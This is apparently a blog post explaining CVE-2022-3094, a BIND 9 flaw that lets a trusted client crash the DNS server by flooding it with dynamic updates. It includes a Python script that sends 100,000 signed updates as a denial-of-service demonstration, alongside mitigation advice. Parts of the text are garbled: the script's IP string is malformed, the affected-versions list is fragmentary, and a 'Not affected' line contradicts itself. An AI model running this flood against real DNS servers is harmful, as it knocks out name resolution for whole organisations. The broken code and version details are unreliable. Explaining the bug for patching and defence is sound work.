CVE-2022-3094 - Flooding BIND with Dynamic DNS Updates Can Crash Your DNS Server
CVE-2022-3094 is a denial-of-service (DoS) vulnerability that affects BIND 9, the popular open-source DNS server software. The issue allows a permitted client—one allowed to make dynamic zone updates—to crash the named process by sending a flood of dynamic DNS update requests, which can consume large amounts of memory before access permissions are even checked.
If the system runs out of available memory as a result, the DNS service will stop functioning, disrupting both your internal and external DNS lookups.
In this post, we'll break down how this works, which versions are affected, and walk through a simple demonstration of the vulnerability. We'll also point to the official advisories and discuss the practical impact for real-world DNS deployments.
The Problem in Simple Terms
When BIND (named) receives a dynamic DNS update (like from DHCP or a script), it allocates memory right away—before even checking if the client is allowed to make changes. If the client is *not* permitted, BIND releases the memory quickly. But, if the client is trusted (allowed to make changes), all the memory used during update processing is retained.
A flood of valid dynamic updates from a trusted client can eventually eat up all the free memory on the server, causing named to crash or be killed by the system’s Out-Of-Memory (OOM) killer.
Even though no in-the-wild attacks have been reported, deliberately exploiting this could result in a Denial of Service affecting any organizations that rely on BIND for their DNS infrastructure.
9.16.8-S1 through 9.16.36-S1
Not affected: BIND versions prior to 9.16 are only vulnerable to degradation (resource exhaustion), not a full memory crash.
Important: The vulnerability can only be triggered by a client which is already *trusted* to send dynamic DNS updates for a zone—usually your DHCP server, administrators, or other internal network components.
BIND crashes or the OS kills the process.
Untrusted clients, or rejected updates, don't pose a significant risk since memory is released quickly when denied.
Example Code: Python Dynamic DNS Update Flood
Here’s a simple example in Python using the dnspython library to flood a BIND server with dynamic updates. (Never use against systems you do not own!)
import dns.query
import dns.tsigkeyring
import dns.update
import time
keyring = dns.tsigkeyring.from_text({
'mykeyname.': 'base64_shared_secret_here'
})
zone = 'example.com.'
server = '192.168.1.10'
# Flood 100,000 DNS updates
for i in range(100000):
update = dns.update.Update(zone, keyring=keyring)
record_name = f'host{i}'
update.replace(record_name, 60, 'A', f'10...{i%255}')
response = dns.query.tcp(update, server)
print(f'Update {i}: {response.rcode()}')
time.sleep(.01) # Remove or adjust to change flood rate
References and Further Reading
- ISC Official Advisory for CVE-2022-3094
- NIST NVD Record
- BIND 9 Documentation – Dynamic Update
- dyn DNS update in dnspython
Exploit reliability: High (if access is available and server is not specially protected)
- Impact: Denial of Service by memory exhaustion; server crashes or is killed; all DNS in affected zones stops resolving
- Mitigations: Patch/update BIND, carefully limit which systems/keys are allowed to perform dynamic DNS updates.
Conclusion
CVE-2022-3094 shows that even trusted clients can be a risk if bugs exist in software design. While it's not a remote unauthenticated exploit, it is dangerous in multi-user environments or where compromise of allowed systems is possible.
Stay patched, restrict permissions, and keep your DNS infrastructure secure.
Original sources
- ISC CVE-2022-3094 Advisory
- NIST NVD Entry
Timeline
Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/03/2023 18:24:00 UTC